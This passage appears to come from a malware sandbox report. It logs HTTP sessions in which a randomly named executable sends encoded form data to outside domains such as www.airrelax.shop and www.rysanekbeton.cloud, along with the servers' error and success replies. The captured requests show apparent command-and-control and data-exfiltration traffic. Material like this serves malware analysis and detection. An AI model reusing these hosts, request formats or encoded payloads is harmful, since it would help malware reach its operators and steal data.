                                                                                  Data Ascii: PHM8hj-=U4g76b6pUyFpp8m1jNAq7ZcElhSN1SOB43ZzUK7Q4ZP/Hc7aet0sqs/urj+67H6KWqZw8Elsn7/Wi7eyBwLA1q8aEKAXz9wICmkFUfLuEMDnoj6WzlcFqUcBbSQHoXskwC8JdpQtoU9SM5YUWRmId3U0/rNQXwGjI09CQKQmDcgXx1N1cO/pxwzT23fFKcOu7FqfxcjScC8jQUyHO1P6sUlYfvwzy8z2i+IPHeCjhHlnDgTTp1AJ8QKPM2skgJyVksEIaylvnPpnIMYVs8PBVrmlKPcv2+CRU8WUNaOnyeVtx/u4RA8vTGpwLrk4XvpLSfRBWllQaZVmaDvmGYdroSdLQ4qC2b983M2xarsyKiGVaQV4UJuR/Lc7cyqKOz2ECOO2jhhdGbSxN3j460++e88QMyZbicCjPi6tjVxA+9atoqPi6OMSC2f/o2BAPZkoluDl6cihwz4555EKdAYByh852/zo438Uo1JGWUhW9Q1NUtStb9T3KiEZgM8W6gDJgyRd3yEcgX9GbxuyfqVUJAD3xz/3ngAjqR3p3lbhJ6X335ngYc7+GGf4z3XcHHl5Pc6cwDu+yNyoBuv6OnjAWtbS9CQh+Nyft0Y9ZChftID5XtQku8r5cbRyKexp6jR1s4XrLNbiz33HxFomGoySLgJe6rVVzVIP4Ac5ezop/enEjMQEfu2MTp72xaYrKq2qQ1wnlzWx8CNphzvcb4CqAe5Ei2P0em489kja5/F5KuJuKS2ajWRcg3WqQfeaSf17N+V2nzl3n8TQUawGiTyTitmp6iAgWkuUCCnKwlaqvC+omCSOd9k70HVFrL/mOUGPT0gwuiADOsf6R/ehvgA3UL1sPHhJEf1+S9Ecg0azyAeYhUwh1pmk3EokWsKhsGr6Yug+nQ2ug/OIn8vqoUlicZmHa28mxr0gPGqi0KdCixXeZxDyvP7/lDekibPJdUe+e+p1jVIMA/PuAXP1VdrX7qaQj5+YVbrYCmgDBfgCqAeA [TRUNCATED]
                                                                                  Dec 9, 2024 06:59:59.626090050 CET355INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 09 Dec 2024 05:59:59 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  40192.168.2.75001781.2.196.19805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 07:00:01.016196966 CET565OUTGET /k6bb/?tHfx=9byl&PHM8hj-=Z6Ib5suwfioT2MqXoPl7+8o1pTKj4Qq520tiYNnV3r2mKqn+I/1Rm9W7kmGP+w3QV4Zo4FZXiImSr7GjAT/7kY4RF4YTze4eHm0UBMvXCvyEnRCS3SYcyFprHgke6jUgzgZsbqAOrl5q HTTP/1.1
                                                                                  Host: www.rysanekbeton.cloud
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 07:00:02.298327923 CET691INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 09 Dec 2024 06:00:02 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  41192.168.2.750018172.67.215.235805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 07:00:12.780421972 CET829OUTPOST /gvzg/ HTTP/1.1
                                                                                  Host: www.airrelax.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.airrelax.shop
                                                                                  Referer: http://www.airrelax.shop/gvzg/
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 36 62 46 4c 79 69 68 6f 38 4a 59 69 79 63 34 78 67 53 52 55 64 41 4c 6d 46 6f 32 77 79 6f 79 47 76 64 6d 67 6b 4b 57 47 39 34 6d 63 54 36 50 6c 66 71 70 52 65 61 2b 4b 62 51 56 32 35 65 41 41 6e 68 35 49 67 4f 73 56 76 35 77 2f 50 69 78 51 78 62 2f 48 79 37 44 64 31 64 37 69 36 61 63 63 52 72 42 39 49 45 68 6a 32 46 48 64 56 6c 32 70 70 58 5a 61 70 7a 59 51 62 74 6c 42 66 57 69 46 6c 79 4e 31 4a 66 41 2b 32 39 38 4d 4d 4c 30 68 69 62 4d 6e 7a 37 50 7a 30 45 59 4c 5a 4a 34 6f 48 50 31 57 37 54 72 4f 6b 69 34 6a 38 77 65 61 44 7a 56 6f 74 43 34 75 61 64 50 64 61 5a 6c 72 50 4f 6d 63 70 7a 76 4a 47 63 65 41 55 33 53 58 62 51 3d 3d
                                                                                  Data Ascii: PHM8hj-=6bFLyiho8JYiyc4xgSRUdALmFo2wyoyGvdmgkKWG94mcT6PlfqpRea+KbQV25eAAnh5IgOsVv5w/PixQxb/Hy7Dd1d7i6accRrB9IEhj2FHdVl2ppXZapzYQbtlBfWiFlyN1JfA+298MML0hibMnz7Pz0EYLZJ4oHP1W7TrOki4j8weaDzVotC4uadPdaZlrPOmcpzvJGceAU3SXbQ==
                                                                                  Dec 9, 2024 07:00:14.169251919 CET1236INHTTP/1.1 405 Not Allowed
                                                                                  Date: Mon, 09 Dec 2024 06:00:13 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0J9aLdfWraoed6lSd8v7d3WmFswUReiOcPbRq0De7cNkjLdHjySgg7DPb%2FbY%2FefNCVMipDtebnDxLBNqAznGhOVQN8qMM2Nsa6fKixqN%2B7iXXajDxHwr2vjeC1Bd2PmW1Pllhg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef2c60d8bb442f7-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2198&min_rtt=2198&rtt_var=1099&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=829&delivery_rate=0&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                  Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSI
                                                                                  Dec 9, 2024 07:00:14.169265985 CET107INData Raw: 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72
                                                                                  Data Ascii: E and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                  Dec 9, 2024 07:00:14.169270039 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  42192.168.2.750019172.67.215.235805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 07:00:15.444647074 CET849OUTPOST /gvzg/ HTTP/1.1
                                                                                  Host: www.airrelax.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.airrelax.shop
                                                                                  Referer: http://www.airrelax.shop/gvzg/
                                                                                  Content-Length: 240
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 36 62 46 4c 79 69 68 6f 38 4a 59 69 6a 49 45 78 69 7a 52 55 66 67 4c 68 4f 49 32 77 35 49 79 34 76 64 71 67 6b 49 36 73 39 71 43 63 64 35 62 6c 65 75 39 52 64 61 2b 4b 54 77 56 7a 68 2b 41 78 6e 68 31 71 67 4d 49 56 76 39 51 2f 50 6a 42 51 78 73 72 47 30 72 44 66 39 39 37 6b 6e 4b 63 63 52 72 42 39 49 46 45 30 32 46 66 64 56 56 47 70 7a 30 42 5a 71 7a 59 50 59 74 6c 42 62 57 6a 4f 6c 79 4e 48 4a 65 73 45 32 2b 45 4d 4d 4c 6b 68 6a 4b 4d 6b 35 37 50 35 70 55 59 41 51 37 4a 32 4f 63 55 74 32 69 6a 4e 72 78 49 2f 35 47 66 34 5a 52 5a 45 7a 54 41 56 65 66 72 72 4e 2f 34 65 4e 50 69 45 6b 52 62 6f 5a 72 37 71 5a 6c 7a 54 4e 75 36 51 31 4d 57 49 38 46 73 64 7a 46 6f 4d 54 75 35 54 31 78 63 3d
                                                                                  Data Ascii: PHM8hj-=6bFLyiho8JYijIExizRUfgLhOI2w5Iy4vdqgkI6s9qCcd5bleu9Rda+KTwVzh+Axnh1qgMIVv9Q/PjBQxsrG0rDf997knKccRrB9IFE02FfdVVGpz0BZqzYPYtlBbWjOlyNHJesE2+EMMLkhjKMk57P5pUYAQ7J2OcUt2ijNrxI/5Gf4ZRZEzTAVefrrN/4eNPiEkRboZr7qZlzTNu6Q1MWI8FsdzFoMTu5T1xc=
                                                                                  Dec 9, 2024 07:00:16.709985971 CET1236INHTTP/1.1 405 Not Allowed
                                                                                  Date: Mon, 09 Dec 2024 06:00:16 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PSCx3DeYs001Apdy%2B3S2KWdu03mI8lkmD7phY4Pv6oTLOGRHkcikzGF6z2YYTLPp4qedAcVx6hgPkJsrIKe5RTfaPiqCQsIkFLd9%2Br5rjbk%2FThkJHxV%2Bejmk3CuGKI8SjlSbmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef2c61e3c1c436e-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1704&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=849&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                  Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MS
                                                                                  Dec 9, 2024 07:00:16.710019112 CET113INData Raw: 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66
                                                                                  Data Ascii: IE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  43192.168.2.750020172.67.215.235805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 07:00:18.122150898 CET1862OUTPOST /gvzg/ HTTP/1.1
                                                                                  Host: www.airrelax.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.airrelax.shop
                                                                                  Referer: http://www.airrelax.shop/gvzg/
                                                                                  Content-Length: 1252
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 36 62 46 4c 79 69 68 6f 38 4a 59 69 6a 49 45 78 69 7a 52 55 66 67 4c 68 4f 49 32 77 35 49 79 34 76 64 71 67 6b 49 36 73 39 71 4b 63 64 4a 48 6c 65 4a 42 52 63 61 2b 4b 5a 51 56 79 68 2b 41 57 6e 68 39 75 67 4d 30 46 76 2f 6f 2f 50 45 70 51 33 5a 58 47 39 72 44 66 78 64 37 6c 36 61 63 56 52 71 74 35 49 45 30 30 32 46 66 64 56 57 65 70 39 33 5a 5a 73 7a 59 51 62 74 6b 56 66 57 69 70 6c 79 56 74 4a 65 59 75 32 76 6b 4d 4d 71 55 68 6c 34 6b 6b 78 37 50 33 71 55 5a 41 51 37 46 58 4f 63 5a 57 32 69 58 72 72 79 59 2f 34 53 66 75 63 79 56 76 73 77 4d 7a 59 5a 71 4e 41 65 34 70 41 73 69 2b 74 47 69 54 59 6f 4c 53 55 6b 6e 53 5a 62 54 47 73 74 71 73 7a 58 63 75 6a 69 4a 46 48 74 67 58 67 30 43 63 33 68 4c 76 51 4d 61 69 75 6b 2f 49 6d 58 52 38 56 76 75 41 44 55 42 47 2f 74 62 65 74 6b 69 45 6a 62 4d 45 6c 67 63 2b 33 44 38 74 6e 64 54 6d 78 64 39 6c 2b 49 48 69 61 39 2f 56 44 35 48 68 6d 6d 2f 36 48 4e 52 58 34 43 6b 47 78 6b 61 67 57 45 68 69 76 57 47 41 4d 36 5a 35 49 57 63 49 69 46 [TRUNCATED]
                                                                                  Data Ascii: PHM8hj-=6bFLyiho8JYijIExizRUfgLhOI2w5Iy4vdqgkI6s9qKcdJHleJBRca+KZQVyh+AWnh9ugM0Fv/o/PEpQ3ZXG9rDfxd7l6acVRqt5IE002FfdVWep93ZZszYQbtkVfWiplyVtJeYu2vkMMqUhl4kkx7P3qUZAQ7FXOcZW2iXrryY/4SfucyVvswMzYZqNAe4pAsi+tGiTYoLSUknSZbTGstqszXcujiJFHtgXg0Cc3hLvQMaiuk/ImXR8VvuADUBG/tbetkiEjbMElgc+3D8tndTmxd9l+IHia9/VD5Hhmm/6HNRX4CkGxkagWEhivWGAM6Z5IWcIiFVdohY9dSyR3r34IpwonhT8ngYk2Mipe2AB0FFi8dTKtiWso+Gxeb5UjBk1sysjOW0flLUFC1tD4mUkts37iUHi9sUyTEBl722BvaK20c3q5kLsO/mzpoZADfYbtik6EKx5NTycGJ5fX4OjeKXx/0Zy1L8l+Oi4nzbQRvHjCMTD0WNrsw8Nr/WG3LqpBmAVbQnmG4Ep9xhie5dk5nIs2vJE+GDbgHjN7CegdupxvAXr8haoXG/61YgL9zQa2SF9ecUtWx4dSUjgbL9FOBi7+vsS576btWUmm7BbF3CoQanUBoBgF0E5627XCMKnptxBIjf3SXzZbHxApQuwz/y0p/teagCUOEmHPXcn8M+IRFdWCgeMXLfKLNcVzd9djFfTtiwI/Pci4s401BZh695hy24aCZLtxrY/evJM3T+MCc9+wN6CUsnK0Ejj2nWj9Y2FUQwbXrtE12ZKfNYgN0vxppLbzUvii6xnXaBcLO5uQ5NKp3zDOGnawBYbFv+iHOuPU+e/PyJ2MA+aDurIlrmyzbjztdMVLGFYzGbXtYIeWkH31tACTE276pOzlp68R/0WDPve3xe7rVtNmclEMqrZEFeQWIK1qlPx7edOKjsHGsqemKJQ+T17kv7/ZYiAG7BT4AuLus2Z/eHcxHMeGBbi7MRHF5riGYkuLY14 [TRUNCATED]
                                                                                  Dec 9, 2024 07:00:19.388838053 CET1236INHTTP/1.1 405 Not Allowed
                                                                                  Date: Mon, 09 Dec 2024 06:00:19 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vp58%2BFWFG9hZv40cyCUsOs54KEjJrg9xV7fkCx4TNAhVlU9K2TmuupGoULevJKLkpg4s1pJUHYFbqxZh2UxLmYVgavowsWCpwbpiVhsgCgXnPTlz14Dpe0%2BzuOodH4pRr9MCIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef2c62ef8ee42e7-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1624&rtt_var=812&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1862&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                  Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE
                                                                                  Dec 9, 2024 07:00:19.388874054 CET110INData Raw: 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65
                                                                                  Data Ascii: and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  44192.168.2.750021172.67.215.235805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 07:00:20.791956902 CET560OUTGET /gvzg/?PHM8hj-=3ZtrxXVK8OpQj/Id+SsCZR/FL5/Fz5CPqtakmq6NsaDAWPHTfqsTRo2NSgZOgOtgjwZcpccTv84fMQQl56Kttpvgnc7345UpTfNvcW90g2TqWWaj2VNxmTxTXc1CDHCPjDNjR8Ywq9s3&tHfx=9byl HTTP/1.1
                                                                                  Host: www.airrelax.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 07:00:22.050440073 CET1236INHTTP/1.1 200 OK
                                                                                  Date: Mon, 09 Dec 2024 06:00:21 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Last-Modified: Fri, 25 Oct 2024 07:07:09 GMT
